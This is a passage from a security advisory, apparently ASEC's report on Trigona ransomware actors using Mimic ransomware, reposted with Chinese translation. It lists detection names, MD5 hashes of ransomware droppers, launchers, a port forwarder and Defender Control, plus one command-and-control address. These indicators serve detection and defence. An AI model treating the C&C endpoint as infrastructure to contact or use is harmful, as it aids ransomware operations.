– Ransom/MDP.Decoy.M1171 – 赎金/MDP。诱饵.M1171
– CredentialAccess/MDP.Mimikatz.M4367
– 凭据访问/MDP。Mimikatz.M4367

IOC
MD5

– a24bac9071fb6e07e13c52f65a093fce : Launcher (pp2.exe)
– a24bac9071fb6e07e13c52f65a093fce : 启动器 (pp2.exe)

– a6e2722cff3abb214dc1437647964c57 : Launcher (pp2.exe)
– a6e2722cff3abb214dc1437647964c57 : 启动器 (pp2.exe)

– 3e26e778a4d28003686596f988942646 : Port Forwarder (4.exe)
– 3e26e778a4d28003686596f988942646:端口转发器(4.exe)

– d6b4b1b6b0ec1799f57142798c5daf5b : Mimic Ransomware Dropper (K2K.exe)
– d6b4b1b6b0ec1799f57142798c5daf5b : 模拟勒索软件滴管 (K2K.exe)

– 6d44f8f3c1608e5958b40f9c6d7b6718 : Mimic Ransomware Dropper (K3K.exe)
– 6d44f8f3c1608e5958b40f9c6d7b6718 : 模拟勒索软件滴管 (K3K.exe)

– b3c8d81d6f8d19e5c07e1ca7932ed5bf : Mimic Ransomware (K2K.exe)
– b3c8d81d6f8d19e5c07e1ca7932ed5bf : 模拟勒索软件 (K2K.exe)

– a02157550bc9b491fd03cad394ccdfe7 : Mimic Ransomware (3usdaa.exe)
– a02157550bc9b491fd03cad394ccdfe7 : 模拟勒索软件 (3usdaa.exe)

– c28b33f7365f9dc72cc291d13458f334 : Trigona Ransomware (build.txt)
– c28b33f7365f9dc72cc291d13458f334:Trigona Ransomware(内部版本.txt)

– ac34ba84a5054cd701efad5dd14645c9 : Defender Control (DC.exe)
– ac34ba84a5054cd701efad5dd14645c9:防御者控制 (DC.exe)

C&C
– 2.57.149[.]233:3366

原文始发于ASEC:Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자

版权声明:admin 发表于 2024年1月29日 下午6:44。
转载请注明:Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자 | CTF导航

相关文章